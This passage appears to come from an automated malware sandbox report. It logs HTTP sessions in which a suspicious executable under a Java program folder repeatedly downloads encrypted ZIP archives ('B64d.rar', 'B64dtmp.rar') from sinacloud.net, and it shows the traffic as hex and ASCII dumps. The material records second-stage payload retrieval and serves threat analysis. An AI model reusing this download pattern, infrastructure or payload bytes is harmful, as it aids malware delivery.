                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: sinacloud.net
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:17.256010056 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:18 GMT
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Length: 1203628
                                                                                                                                    Connection: keep-alive
                                                                                                                                    X-RequestId: 2ee6c47a-2408-0616-3017-b4055d752e03
                                                                                                                                    X-Requester: GRPS000000ANONYMOUSE
                                                                                                                                    Last-Modified: Tue, 06 Aug 2024 08:14:44 GMT
                                                                                                                                    X-Filesize: 1203628
                                                                                                                                    ETag: "608c268fcced29d7b47cf80a29ab6d38"
                                                                                                                                    x-amz-meta-crc32: 92F2C6C7
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    Access-Control-Allow-Headers: Origin, Content-Type, Accept, Range, Content-Length
                                                                                                                                    Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS, HEAD
                                                                                                                                    Access-Control-Max-Age: 31536000
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Content-Range: bytes 0-1203627/1203628
                                                                                                                                    Data Raw: 50 4b 03 04 14 00 01 00 08 00 cf 81 06 59 03 1b bf f6 3a 5d 12 00 c8 de 12 00 08 00 00 00 42 36 34 64 2e 72 61 72 40 6e f1 89 2f a8 19 6b 8a e6 28 02 81 ce d4 ef c3 89 21 f5 ee 6c 5f f2 8b ad ab 5b 23 87 32 82 2a 47 bc 18 0b e7 99 5f d4 8d 5b fe 17 57 ab da 87 46 60 c4 98 64 e0 d7 3c 60 e0 2c 16 95 c8 d0 d5 3b b5 92 17 56 66 30 dc 36 71 bb 2c ae 11 01 ce 9e 5b 3b e9 99 71 86 87 4a a5 d7 4f a0 ce 5b b5 c8 70 20 61 fd ce 2d dd 63 b3 64 0a 1b c4 6d f4 ca 45 57 7d 19 af 7d ba 7e 96 9f 4c fb ba 8c 99 02 aa 93 8b e6 7c b0 45 ff 38 85 1b 44 68 d3 58 44 34 b8 d6 90 11 79 bd bc d7 5d 47 2a 97 43 a6 79 05 9a 2e 69 60 c9 56 64 ef 4b c5 af 59 38 70 da 1e 8a b6 7e 3b 21 4c 40 53 07 ac cd 72 9d f1 07 00 f2 4b 50 71 1a 7d 3c 03 00 d1 92 65 26 63 81 6e 9b e5 50 80 49 9e f3 af 22 66 02 61 65 29 af dc 1a 9d e8 7e cb bb 32 83 90 8f e6 6a 27 67 8b 0c f1 8f a7 2c d2 68 14 9d d8 00 2f bb f7 0a 8c 90 5e c9 e0 72 0f 40 64 b9 62 c1 6f 62 55 63 84 b8 f2 13 4d 5a 60 2c 49 d5 19 03 af 27 87 11 ae ea 7d 8d d0 19 6d 12 aa f9 91 [TRUNCATED]
                                                                                                                                    Data Ascii: PKY:]B64d.rar@n/k(!l_[#2*G_[WF`d<`,;Vf06q,[;qJO[p a-cdmEW}}~L|E8DhXD4y]G*Cy.i`VdKY8p~;!L@SrKPq}<e&cnPI"fae)~2j'g,h/^r@dbobUcMZ`,I'}mHu$GGqfKgXX[&,.qLc=VA'zlkmULl7HClEE(wJwLyWKwA@5EZSx-})N`)D{y5rS/V.DAer#Mg&A7iA]eNyE6,W9Lm?C
                                                                                                                                    Aug 6, 2024 10:30:17.256047964 CEST1236INData Raw: 99 16 54 52 35 be 4e 68 ce 0f 2d 4e 64 d0 de 6c 32 6f f4 05 1d 2f fa 81 50 0e e3 2d c3 2b 9a 1e f3 5c b2 98 5b 0a e6 64 f6 d8 53 00 e7 8a 6a 68 06 aa 30 02 e7 a6 b2 79 c0 3e 9b 2d f4 85 9a 41 a7 1a 73 1f 1d ba 65 84 d6 01 0d e6 7d 2e 6a 86 9b 3b
                                                                                                                                    Data Ascii: TR5Nh-Ndl2o/P-+\[dSjh0y>-Ase}.j;=_8~ZuM{{ 1mZ,6%M.xYcXw"!_-Ikx8kZ{rJ,L=4`bt;b%}bX8Y*2sD<F1A)w
                                                                                                                                    Aug 6, 2024 10:30:17.256059885 CEST1236INData Raw: f0 d0 4e 18 ef 3d 7d 4d 46 64 1e a3 18 e5 ee 05 40 e3 2d 77 08 e5 ce 8c 6e f1 7e 05 ce 40 ae 1f 81 fe 0a f0 0f e7 fe 8c 01 ba d2 04 e5 6f 7e 7c 26 c4 c6 a7 c8 4c fe bc c1 56 00 0e 84 c9 cd d1 40 79 b8 f7 ed 5e 1c a8 8e 1f 05 be 01 6b 7e fe 90 52
                                                                                                                                    Data Ascii: N=}MFd@-wn~@o~|&LV@y^k~R'yS,6q[?,{N(GtToU>[':\7}(&_i!k_[]":ZGE9EskO[p| = q2CK
                                                                                                                                    Aug 6, 2024 10:30:17.256072044 CEST497INData Raw: 51 2d 29 5b b1 84 7b 22 48 7f 1c 53 bc 01 3e 35 c9 ef 16 80 fb 74 87 8b 5a 50 b6 36 2a 58 d1 e3 6a d4 d7 38 40 1a a6 f9 8e 78 fe 6e 8c 36 36 53 43 7c 84 44 ee cb 66 6d da fc 7a 8c bf 89 77 3a bb 86 37 5e f3 8e c4 1f f9 f7 a2 33 a6 49 bd 76 5b 47
                                                                                                                                    Data Ascii: Q-)[{"HS>5tZP6*Xj8@xn66SC|Dfmzw:7^3Iv[Ghaj]b7*s;`3K!D/"xU> E&:6?0i$#g +xeuV.fVT_+HU6lwzxC8Bd,%y^S
                                                                                                                                    Aug 6, 2024 10:30:17.256089926 CEST1236INData Raw: 3e c6 55 3f 99 50 14 89 1f 52 59 bb 09 cd 40 4a 33 4b f6 93 3a a9 df 81 3b 5f 4c 50 2b b8 20 3e b0 8f 92 b7 cd 4a e6 86 39 a8 b7 38 70 db 85 2d 75 58 df 6c 42 97 20 0c d6 dc e6 f2 68 f1 69 e2 a0 2f eb 54 fa 56 3d 8c 17 cb 9e 9c b9 21 ed c6 f2 cd
                                                                                                                                    Data Ascii: >U?PRY@J3K:;_LP+ >J98p-uXlB hi/TV=!0lR?A8Kv$!>*\~>eg[_:t>9re?:OxF)F4/o4Ly-m"e2Ep+~<Q>W`vr
                                                                                                                                    Aug 6, 2024 10:30:17.256099939 CEST1236INData Raw: 3c da 80 89 f3 6f a7 f3 b5 fd 60 7a a1 80 65 df 59 19 5c 59 58 9a f3 9c 61 89 8b 36 34 f7 4d 4f 21 41 4a e9 a1 cb 60 34 a5 25 51 9a d0 ba 17 cf c4 5a 63 c0 f8 94 b1 5c 57 b0 21 5c b8 2f c4 23 bf 9e ed db 2b 00 02 df 58 06 fc 1e 2a fc d4 65 60 fa
                                                                                                                                    Data Ascii: <o`zeY\YXa64MO!AJ`4%QZc\W!\/#+X*e`B.uJLO:Yxl%I5~xZB'JvuTq$9E3G}j\X&')6FO`t83rbq%<Vm3bhKQ[d,#gOnoZk<WK
                                                                                                                                    Aug 6, 2024 10:30:17.256110907 CEST1236INData Raw: 80 2a a7 c7 14 f4 97 ba 24 b1 68 09 24 34 43 f4 b9 79 3c 8f 8f 4c 55 56 a1 6a bb 40 66 37 cf d2 87 ab 2b 8a 3f ef a8 58 b7 ed 2c d2 3d 42 6d 2f 65 9d c0 e1 a6 56 f5 4c 11 e9 34 1f 2d 4b 09 5e 75 50 3b ee 93 9e ed d4 6f 4f d0 43 fa d8 7e ae 60 78
                                                                                                                                    Data Ascii: *$h$4Cy<LUVj@f7+?X,=Bm/eVL4-K^uP;oOC~`xD|]nha_B'(OiPoTuHtK3c;(wS3(iW4s\]miV~+3CJRHo`wWhS^ 4RWeJomFgkp
                                                                                                                                    Aug 6, 2024 10:30:17.256145954 CEST1236INData Raw: 35 db 57 80 e1 ae 98 49 65 7d 38 d8 48 04 4d c1 74 a3 b5 a4 58 27 b6 50 a3 60 6f 6e 71 68 95 51 2e d4 af d1 16 9c 9a 9f 0f 0d 2a f4 17 8d f8 bb 70 55 d9 7e 0a 07 36 1a 09 fb b1 aa 3d fb e4 94 78 43 ed 10 48 7e 56 68 5f 0c a9 c1 be 66 fc fd d7 08
                                                                                                                                    Data Ascii: 5WIe}8HMtX'P`onqhQ.*pU~6=xCH~Vh_f +Mk]@><TPuWlyT[XeNPq E;;ix>IF;$owd=vAY*L`wu[GnD&c_`"
                                                                                                                                    Aug 6, 2024 10:30:17.256156921 CEST1236INData Raw: 0a fe b7 36 b0 8c b9 01 02 cb f2 1b 44 4f 18 02 50 21 21 d3 8e da 9a c7 3f 69 30 89 9d a5 d8 d5 65 f2 cc 49 79 e4 77 53 fe 8a 4e 40 4b 65 06 2a 18 8a 66 e8 4b 59 9b a9 d4 03 95 0a ce 53 69 cb 6c 70 48 51 21 f0 c9 7e bf 19 6b 52 8d a5 6e 4c bc 09
                                                                                                                                    Data Ascii: 6DOP!!?i0eIywSN@Ke*fKYSilpHQ!~kRnL n5SEckfxd<nRY\RU}[cfwU!zI]_*nhZt@a0>i@;5D:R2^,ACW*i0 v3.|rth}cQ4a$Iy95oV
                                                                                                                                    Aug 6, 2024 10:30:17.256169081 CEST1236INData Raw: 05 63 cc b8 25 3b cf fe 74 56 30 7f ab e1 02 66 4b 0e 1c b1 4d e0 f0 a1 b4 07 60 95 13 cc b9 a1 9c d8 02 24 db 3f 72 cf b8 49 9e fb 3e 77 e8 64 80 1c 62 20 e7 dc 85 c1 e6 2a 90 7b f9 34 c5 4a 91 c3 3e 82 5c 8d 3c 15 ac 9a 93 21 b6 1a 01 d8 8a 38
                                                                                                                                    Data Ascii: c%;tV0fKM`$?rI>wdb *{4J>\<!80}Z?".8ph ~[/,{M${3oMxTN )f`p(NnR$%V|8);zdAYaWF0T-!dj>9
                                                                                                                                    Aug 6, 2024 10:30:17.261504889 CEST1236INData Raw: e1 a3 fa d8 e7 7c 84 e5 40 96 d0 62 71 86 41 3a 99 e6 ee e2 2c 1b 85 96 08 82 9d b2 f6 b6 00 95 72 36 9a 37 51 87 ca 27 9e 71 cc 80 4d 5a 4a 0d aa ac c2 50 d8 55 23 36 bc e3 2e 44 33 f4 bc 38 99 76 bc 2a 1c f3 2f 18 16 6d 8a 96 f5 8b d7 09 f5 89
                                                                                                                                    Data Ascii: |@bqA:,r67Q'qMZJPU#6.D38v*/m4n}Lw,x?SA.X`)nKEbCYj&9:^#(urNLprp,AITm3/ pf`]SW,TxeF_ pYP$K


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    52192.168.2.64977927.221.16.14980420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:23.721474886 CEST232OUTGET /operate/24647 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: sinacloud.net
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:24.856478930 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:22 GMT
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Length: 1316605
                                                                                                                                    Connection: keep-alive
                                                                                                                                    X-RequestId: 303a0036-2408-0616-3024-0894eff93894
                                                                                                                                    X-Requester: GRPS000000ANONYMOUSE
                                                                                                                                    Last-Modified: Tue, 06 Aug 2024 08:15:36 GMT
                                                                                                                                    X-Filesize: 1316605
                                                                                                                                    ETag: "f9dd538cb11b20241921b08a82a30840"
                                                                                                                                    x-amz-meta-crc32: DD1290BA
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    Access-Control-Allow-Headers: Origin, Content-Type, Accept, Range, Content-Length
                                                                                                                                    Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS, HEAD
                                                                                                                                    Access-Control-Max-Age: 31536000
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Content-Range: bytes 0-1316604/1316605
                                                                                                                                    Data Raw: 50 4b 03 04 14 00 01 00 08 00 eb 81 06 59 c5 f1 09 e8 85 16 14 00 d8 98 14 00 0b 00 00 00 42 36 34 64 74 6d 70 2e 72 61 72 7f 80 55 a0 15 9e a5 cc b5 84 1b b2 27 24 62 f7 30 37 60 85 28 7e 2e 7e 2d 8f ad bd bf a4 af 4a 99 c5 82 c8 26 47 cc a8 23 bf 2a 26 1d 12 2b 30 21 de 1a 3a e7 c8 95 a5 9f a0 aa 4b 44 60 47 0b 4e df 80 b3 85 a4 e8 df a8 1e 4d 2a 6a e5 1d c0 35 76 0b b7 2d af e1 16 10 ae aa c3 95 d8 2a 1c 63 64 c8 73 06 46 21 91 d7 93 13 b8 5c d5 15 e2 c3 e9 ce 1c ad 2c 6a 24 29 37 a1 0d 65 fa 6d 9e 36 0a 6e 40 15 31 3c 01 62 d9 07 23 d5 70 4b 15 5a 72 fd 0e e8 94 87 69 77 67 61 48 8d 30 80 6f 20 48 77 2c a7 b9 7b d2 1e 0e 8b 8f 7d eb 22 a2 f0 27 23 4d 1b 4d e5 ba a6 83 de 49 c9 10 0d c5 d5 2e ad 77 a1 11 7f d5 23 77 fd a0 47 34 2f f4 9e cb b4 c3 b2 6a 80 7e e7 05 33 82 02 df df 48 6d 99 f8 29 bd 8d a5 4a 76 2b 49 48 e8 56 35 38 e5 2b 4b 18 b1 b3 ce b1 10 c9 7d 72 0d 36 b2 db 21 a0 19 4d 9a 80 57 33 a9 4c 18 f2 45 35 67 45 54 88 0d 08 c3 84 5f d0 0b db 1e f9 07 8b a8 d1 8c 47 c6 d5 5f 77 a8 d9 f8 [TRUNCATED]
                                                                                                                                    Data Ascii: PKYB64dtmp.rarU'$b07`(~.~-J&G#*&+0!:KD`GNM*j5v-*cdsF!\,j$)7em6n@1<b#pKZriwgaH0o Hw,{}"'#MMI.w#wG4/j~3Hm)Jv+IHV58+K}r6!MW3LE5gET_G_w2$u(D9H'j|U$TGGLdIs.j<"2.lPLy;;'6v"~H@S}-~|{a)<~*(j,3JGi_x@-Tg/2&S7_v>9
                                                                                                                                    Aug 6, 2024 10:30:24.856534958 CEST1236INData Raw: e9 81 f6 62 61 27 17 9d 5e b4 90 c0 97 fd 4b ac 5b 53 b6 e8 13 c4 7c c3 b6 99 c6 9f f1 c0 65 13 6f 2d d3 11 b9 c6 38 60 0d 6f c3 17 d8 2d 82 f3 57 4b 80 ee da 8c 09 81 0a c8 54 9e 53 87 f0 de f3 3f 0f 82 aa 45 db 53 a6 4f 43 16 70 47 41 28 bf 75
                                                                                                                                    Data Ascii: ba'^K[S|eo-8`o-WKTS?ESOCpGA(uE6c\hNF_}t,]T=j{~Jh(lC(Tc~fkA#K^?c>)o>Fn|^(gfR#4?\SK)ixwAkn$&4qGgaC].Y{"+kH
                                                                                                                                    Aug 6, 2024 10:30:24.856548071 CEST1236INData Raw: 54 55 be d5 54 0b 2c a5 62 97 35 cd 7e 02 56 d8 cb 1a 9a 7e 98 bb b9 2e e4 cb 08 8f 12 15 60 1b c3 17 92 30 8b 1a 5e 37 31 9d d6 ca ef 1f 48 69 e3 1e f7 44 1e ba 06 e9 b2 c0 1d e8 13 02 33 00 30 94 a6 67 46 2a 95 ed 8a 05 f9 05 66 3a 40 86 b4 f7
                                                                                                                                    Data Ascii: TUT,b5~V~.`0^71HiD30gF*f:@jxg8cfF_|hYfgV8]b|Sw>D^mxrjxT|M'Z0A6"C7ew2 9'Sp}*9^IAsJ54GGMnL
                                                                                                                                    Aug 6, 2024 10:30:24.856560946 CEST1236INData Raw: 1d 0c a4 b3 3b 76 50 7c 32 85 c4 b7 62 41 1d 3c 16 f7 ed 45 80 29 8d a6 8a 65 94 cf 74 f2 04 bf 1e 3e ee 25 b2 36 7b e5 cd c9 c3 c5 96 a6 f6 40 83 94 83 12 94 0a df b7 f5 04 6f ce 8b f8 1a bf 65 d5 3e 70 95 60 27 3b ae 50 f5 7d cc 1b 18 bc 9d f7
                                                                                                                                    Data Ascii: ;vP|2bA<E)et>%6{@oe>p`';P}Q+yB(L%2{ibBOP|m9qsVLB"@fj{pjkt56sv5fs =rH.wIi^+[_b.G99}!?\HQ{u
                                                                                                                                    Aug 6, 2024 10:30:24.856565952 CEST1236INData Raw: 65 ff 3b 2e 39 93 77 c7 39 80 de 38 c8 96 ee 4b 9e 0f a6 1e 71 ee e1 7e a3 d1 7f 84 d1 4b c6 2a e9 2d d7 80 bb 35 08 52 9e 90 6f a6 ff 37 ed 53 f1 87 8e 0e 15 12 8d b3 2d b7 3e da 7f 44 bc 7b 55 ed 86 9c 11 79 ae 2a b4 8d c5 a1 06 02 b0 b2 e1 90
                                                                                                                                    Data Ascii: e;.9w98Kq~K*-5Ro7S->D{Uy*1fi[qZ#*a`YaR}ctf64bK=J_Pm-AMnL#:e]dE<.z/QV!)}(ibZ9
                                                                                                                                    Aug 6, 2024 10:30:24.856571913 CEST1236INData Raw: 38 a9 21 f3 c2 38 e1 4e 44 89 40 cc fb 18 a1 6a 7f 36 7e 60 8c 48 9f 0b c5 8e 9d 0b d8 40 72 f2 cc 47 e6 5f b4 74 35 1c 08 c7 52 13 8f 78 7a 3e 8c 42 af 42 17 88 8f 66 d5 e3 3b 77 76 b6 63 d4 9b 18 e3 ac ff 93 c7 24 12 e0 82 cd e2 eb bb 9d 08 89
                                                                                                                                    Data Ascii: 8!8ND@j6~`H@rG_t5Rxz>BBf;wvc$;iOOq+64^"`r/rw#v)W4Mj8J@C#d|H|Cx/J>Ex}bs]Hn.Io{[6qJ*@Dt
                                                                                                                                    Aug 6, 2024 10:30:24.856590033 CEST1236INData Raw: 71 9c 11 1d e6 6f 44 34 fe cc a3 91 cb 25 fe 50 fe c0 48 25 e8 5d 08 69 01 48 7e 41 e3 01 f7 54 dc 8f 06 cc 27 b7 a7 b5 ac 14 b9 a3 69 d2 89 72 d7 6c 06 2e 13 b0 46 6c 54 c7 d5 1c e2 9d b9 60 e8 f3 d3 9a e1 24 ad 8b fc cd 44 46 30 96 54 4e 9c 56
                                                                                                                                    Data Ascii: qoD4%PH%]iH~AT'irl.FlT`$DF0TNV>M;IEZYb,MJLy&O9PW<?4`yc7A,NF5^-'^3)%v5aFa'$X$hTHcr>WJ3"yhHq
                                                                                                                                    Aug 6, 2024 10:30:24.856595993 CEST1236INData Raw: d8 37 8d e7 a5 d8 a7 74 63 78 9f a8 03 64 d6 1c 82 5b 53 d2 18 f1 4c 92 45 53 22 2f 73 30 87 aa a6 1a 8b c1 ec cf 22 3c 4a 89 f8 76 40 af 8a e7 20 68 9b 6f cc dd 94 d8 bc 57 20 e0 8b a6 cd 8a ce 61 af 41 94 b6 ee 8c 4f 04 e2 4e b7 ba 62 1a 19 41
                                                                                                                                    Data Ascii: 7tcxd[SLES"/s0"<Jv@ hoW aAONbAt35]Cwa3|986'u+;WPM39_yvrF(qN}gGEtE-$n[HC<2s"Q}?!,^F"RA
                                                                                                                                    Aug 6, 2024 10:30:24.856606960 CEST1236INData Raw: 04 be c2 88 52 29 72 91 f8 fa 33 f4 6c af b1 77 df dd ab ec 89 ae 07 3b b6 e8 48 ec 96 d7 ff 41 cf 79 94 91 25 e4 4d b6 54 4a c3 74 3c 69 80 24 03 a7 d2 8c b3 27 d2 53 f1 76 40 4e 3b e6 10 3f c8 aa cd d6 f4 13 b6 48 b0 c6 4f 19 9f 38 9c 44 f7 59
                                                                                                                                    Data Ascii: R)r3lw;HAy%MTJt<i$'Sv@N;?HO8DYe\0&\ uYkqH!D?7'"WXO>>{8$PIW|iXVMR(0[NS)R3YeSuG6.>-}FAik&{
                                                                                                                                    Aug 6, 2024 10:30:24.856625080 CEST1236INData Raw: 22 a4 2e 79 0e d2 ba dd ce 1e 3b 11 8b 89 ff f2 bc 03 4c 29 62 0f 50 da 32 5f f8 f7 0c d7 d9 fe da 5e 50 b9 0f f2 88 39 b1 b7 97 a8 b7 45 28 5b e5 4d 20 16 50 db 5a b5 b1 8c f1 13 c6 46 ba bb 19 5d ae d4 f2 ef 80 f7 e0 24 33 e4 d1 bb 6f 09 62 71
                                                                                                                                    Data Ascii: ".y;L)bP2_^P9E([M PZF]$3obqQTNi(?'?pP2rT].F-b@\JKnbEoaw[7KX)'gea@84sn.u&PBRAH][t#
                                                                                                                                    Aug 6, 2024 10:30:24.861505032 CEST1236INData Raw: 12 5e e2 da e1 de 36 9e 83 f1 5d 95 21 77 87 64 4e 04 8c d5 6d 76 f7 26 83 91 ff 0b f2 8d be 31 29 3d 76 c9 b5 68 91 aa fa cb 41 1e 44 b6 d8 a9 92 25 80 db 7a 78 93 0d f4 56 06 37 98 c5 c1 e8 0f 4c 3f 1a bc ec 87 b7 c2 bd e9 ef 76 44 26 b2 53 69
                                                                                                                                    Data Ascii: ^6]!wdNmv&1)=vhAD%zxV7L?vD&SinZtVs"ZvWZUKK@>}&U9su/\i@=lD&!oR|hkjDbh/qOIor&X7GtVhIsc_S?%:4


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    53192.168.2.64978127.221.16.17980420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:34.265505075 CEST232OUTGET /operate/24647 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: sinacloud.net
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:35.627526999 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:36 GMT
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Length: 1316605
                                                                                                                                    Connection: keep-alive
                                                                                                                                    X-RequestId: ff720022-2408-0616-3035-5ca7213e036a
                                                                                                                                    X-Requester: GRPS000000ANONYMOUSE
                                                                                                                                    Last-Modified: Tue, 06 Aug 2024 08:15:36 GMT
                                                                                                                                    X-Filesize: 1316605
                                                                                                                                    ETag: "f9dd538cb11b20241921b08a82a30840"
                                                                                                                                    x-amz-meta-crc32: DD1290BA
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    Access-Control-Allow-Headers: Origin, Content-Type, Accept, Range, Content-Length
                                                                                                                                    Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS, HEAD
                                                                                                                                    Access-Control-Max-Age: 31536000
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Content-Range: bytes 0-1316604/1316605
                                                                                                                                    Data Raw: 50 4b 03 04 14 00 01 00 08 00 eb 81 06 59 c5 f1 09 e8 85 16 14 00 d8 98 14 00 0b 00 00 00 42 36 34 64 74 6d 70 2e 72 61 72 7f 80 55 a0 15 9e a5 cc b5 84 1b b2 27 24 62 f7 30 37 60 85 28 7e 2e 7e 2d 8f ad bd bf a4 af 4a 99 c5 82 c8 26 47 cc a8 23 bf 2a 26 1d 12 2b 30 21 de 1a 3a e7 c8 95 a5 9f a0 aa 4b 44 60 47 0b 4e df 80 b3 85 a4 e8 df a8 1e 4d 2a 6a e5 1d c0 35 76 0b b7 2d af e1 16 10 ae aa c3 95 d8 2a 1c 63 64 c8 73 06 46 21 91 d7 93 13 b8 5c d5 15 e2 c3 e9 ce 1c ad 2c 6a 24 29 37 a1 0d 65 fa 6d 9e 36 0a 6e 40 15 31 3c 01 62 d9 07 23 d5 70 4b 15 5a 72 fd 0e e8 94 87 69 77 67 61 48 8d 30 80 6f 20 48 77 2c a7 b9 7b d2 1e 0e 8b 8f 7d eb 22 a2 f0 27 23 4d 1b 4d e5 ba a6 83 de 49 c9 10 0d c5 d5 2e ad 77 a1 11 7f d5 23 77 fd a0 47 34 2f f4 9e cb b4 c3 b2 6a 80 7e e7 05 33 82 02 df df 48 6d 99 f8 29 bd 8d a5 4a 76 2b 49 48 e8 56 35 38 e5 2b 4b 18 b1 b3 ce b1 10 c9 7d 72 0d 36 b2 db 21 a0 19 4d 9a 80 57 33 a9 4c 18 f2 45 35 67 45 54 88 0d 08 c3 84 5f d0 0b db 1e f9 07 8b a8 d1 8c 47 c6 d5 5f 77 a8 d9 f8 [TRUNCATED]
                                                                                                                                    Data Ascii: PKYB64dtmp.rarU'$b07`(~.~-J&G#*&+0!:KD`GNM*j5v-*cdsF!\,j$)7em6n@1<b#pKZriwgaH0o Hw,{}"'#MMI.w#wG4/j~3Hm)Jv+IHV58+K}r6!MW3LE5gET_G_w2$u(D9H'j|U$TGGLdIs.j<"2.lPLy;;'6v"~H@S}-~|{a)<~*(j,3JGi_x@-Tg/2&S7_v>9
                                                                                                                                    Aug 6, 2024 10:30:35.627577066 CEST1236INData Raw: e9 81 f6 62 61 27 17 9d 5e b4 90 c0 97 fd 4b ac 5b 53 b6 e8 13 c4 7c c3 b6 99 c6 9f f1 c0 65 13 6f 2d d3 11 b9 c6 38 60 0d 6f c3 17 d8 2d 82 f3 57 4b 80 ee da 8c 09 81 0a c8 54 9e 53 87 f0 de f3 3f 0f 82 aa 45 db 53 a6 4f 43 16 70 47 41 28 bf 75
                                                                                                                                    Data Ascii: ba'^K[S|eo-8`o-WKTS?ESOCpGA(uE6c\hNF_}t,]T=j{~Jh(lC(Tc~fkA#K^?c>)o>Fn|^(gfR#4?\SK)ixwAkn$&4qGgaC].Y{"+kH
                                                                                                                                    Aug 6, 2024 10:30:35.627610922 CEST1236INData Raw: 54 55 be d5 54 0b 2c a5 62 97 35 cd 7e 02 56 d8 cb 1a 9a 7e 98 bb b9 2e e4 cb 08 8f 12 15 60 1b c3 17 92 30 8b 1a 5e 37 31 9d d6 ca ef 1f 48 69 e3 1e f7 44 1e ba 06 e9 b2 c0 1d e8 13 02 33 00 30 94 a6 67 46 2a 95 ed 8a 05 f9 05 66 3a 40 86 b4 f7
                                                                                                                                    Data Ascii: TUT,b5~V~.`0^71HiD30gF*f:@jxg8cfF_|hYfgV8]b|Sw>D^mxrjxT|M'Z0A6"C7ew2 9'Sp}*9^IAsJ54GGMnL
                                                                                                                                    Aug 6, 2024 10:30:35.627644062 CEST1236INData Raw: 1d 0c a4 b3 3b 76 50 7c 32 85 c4 b7 62 41 1d 3c 16 f7 ed 45 80 29 8d a6 8a 65 94 cf 74 f2 04 bf 1e 3e ee 25 b2 36 7b e5 cd c9 c3 c5 96 a6 f6 40 83 94 83 12 94 0a df b7 f5 04 6f ce 8b f8 1a bf 65 d5 3e 70 95 60 27 3b ae 50 f5 7d cc 1b 18 bc 9d f7
                                                                                                                                    Data Ascii: ;vP|2bA<E)et>%6{@oe>p`';P}Q+yB(L%2{ibBOP|m9qsVLB"@fj{pjkt56sv5fs =rH.wIi^+[_b.G99}!?\HQ{u
                                                                                                                                    Aug 6, 2024 10:30:35.627677917 CEST1236INData Raw: 65 ff 3b 2e 39 93 77 c7 39 80 de 38 c8 96 ee 4b 9e 0f a6 1e 71 ee e1 7e a3 d1 7f 84 d1 4b c6 2a e9 2d d7 80 bb 35 08 52 9e 90 6f a6 ff 37 ed 53 f1 87 8e 0e 15 12 8d b3 2d b7 3e da 7f 44 bc 7b 55 ed 86 9c 11 79 ae 2a b4 8d c5 a1 06 02 b0 b2 e1 90
                                                                                                                                    Data Ascii: e;.9w98Kq~K*-5Ro7S->D{Uy*1fi[qZ#*a`YaR}ctf64bK=J_Pm-AMnL#:e]dE<.z/QV!)}(ibZ9
                                                                                                                                    Aug 6, 2024 10:30:35.627710104 CEST1236INData Raw: 38 a9 21 f3 c2 38 e1 4e 44 89 40 cc fb 18 a1 6a 7f 36 7e 60 8c 48 9f 0b c5 8e 9d 0b d8 40 72 f2 cc 47 e6 5f b4 74 35 1c 08 c7 52 13 8f 78 7a 3e 8c 42 af 42 17 88 8f 66 d5 e3 3b 77 76 b6 63 d4 9b 18 e3 ac ff 93 c7 24 12 e0 82 cd e2 eb bb 9d 08 89
                                                                                                                                    Data Ascii: 8!8ND@j6~`H@rG_t5Rxz>BBf;wvc$;iOOq+64^"`r/rw#v)W4Mj8J@C#d|H|Cx/J>Ex}bs]Hn.Io{[6qJ*@Dt
                                                                                                                                    Aug 6, 2024 10:30:35.627743959 CEST1013INData Raw: 71 9c 11 1d e6 6f 44 34 fe cc a3 91 cb 25 fe 50 fe c0 48 25 e8 5d 08 69 01 48 7e 41 e3 01 f7 54 dc 8f 06 cc 27 b7 a7 b5 ac 14 b9 a3 69 d2 89 72 d7 6c 06 2e 13 b0 46 6c 54 c7 d5 1c e2 9d b9 60 e8 f3 d3 9a e1 24 ad 8b fc cd 44 46 30 96 54 4e 9c 56
                                                                                                                                    Data Ascii: qoD4%PH%]iH~AT'irl.FlT`$DF0TNV>M;IEZYb,MJLy&O9PW<?4`yc7A,NF5^-'^3)%v5aFa'$X$hTHcr>WJ3"yhHq
